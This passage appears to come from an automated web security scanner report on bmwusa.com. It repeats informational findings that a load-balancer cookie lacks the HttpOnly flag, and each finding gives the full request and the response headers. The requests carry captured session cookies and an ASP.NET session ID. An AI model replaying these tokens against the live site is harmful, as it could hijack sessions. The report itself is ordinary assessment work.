Date: Fri, 21 Jan 2011 21:54:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:14:20 GMT;path=/
Content-Length: 202223


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.384. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35d/x5seriessavmediagallery.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35d/x5seriessavmediagallery.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35d/x5seriessavmediagallery.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:53:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:13:42 GMT;path=/
Content-Length: 202224


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.385. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35i/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35i/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35i/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:46:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:06:55 GMT;path=/
Content-Length: 214350


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.386. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35i/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35i/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35i/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:47:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:07:24 GMT;path=/
Content-Length: 222920


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.387. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35i/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35i/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35i/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:47:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:07:08 GMT;path=/
Content-Length: 211101


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.388. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35i/x5seriessavmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35i/x5seriessavmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35i/x5seriessavmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:47:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:07:12 GMT;path=/
Content-Length: 202179


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.389. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35ipremium/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35ipremium/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35ipremium/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:47:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:07:46 GMT;path=/
Content-Length: 214639


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.390. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35ipremium/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35ipremium/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35ipremium/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:50:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:10:01 GMT;path=/
Content-Length: 223773


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.391. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35ipremium/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35ipremium/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35ipremium/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:49:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:09:37 GMT;path=/
Content-Length: 211572


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.392. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35ipremium/x5seriessavmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35ipremium/x5seriessavmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35ipremium/x5seriessavmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:50:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:10:06 GMT;path=/
Content-Length: 202433


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.393. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35ipremium/x5seriessavmediagallery.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35ipremium/x5seriessavmediagallery.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35ipremium/x5seriessavmediagallery.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:49:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:09:43 GMT;path=/
Content-Length: 202434


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.394. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35isportactivity/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35isportactivity/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35isportactivity/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:51:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:11:44 GMT;path=/
Content-Length: 214810


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.395. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35isportactivity/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35isportactivity/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35isportactivity/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:53:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:13:06 GMT;path=/
Content-Length: 224590


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.396. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35isportactivity/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35isportactivity/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35isportactivity/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:52:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:12:17 GMT;path=/
Content-Length: 212232


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.397. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35isportactivity/x5seriessavmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35isportactivity/x5seriessavmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35isportactivity/x5seriessavmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
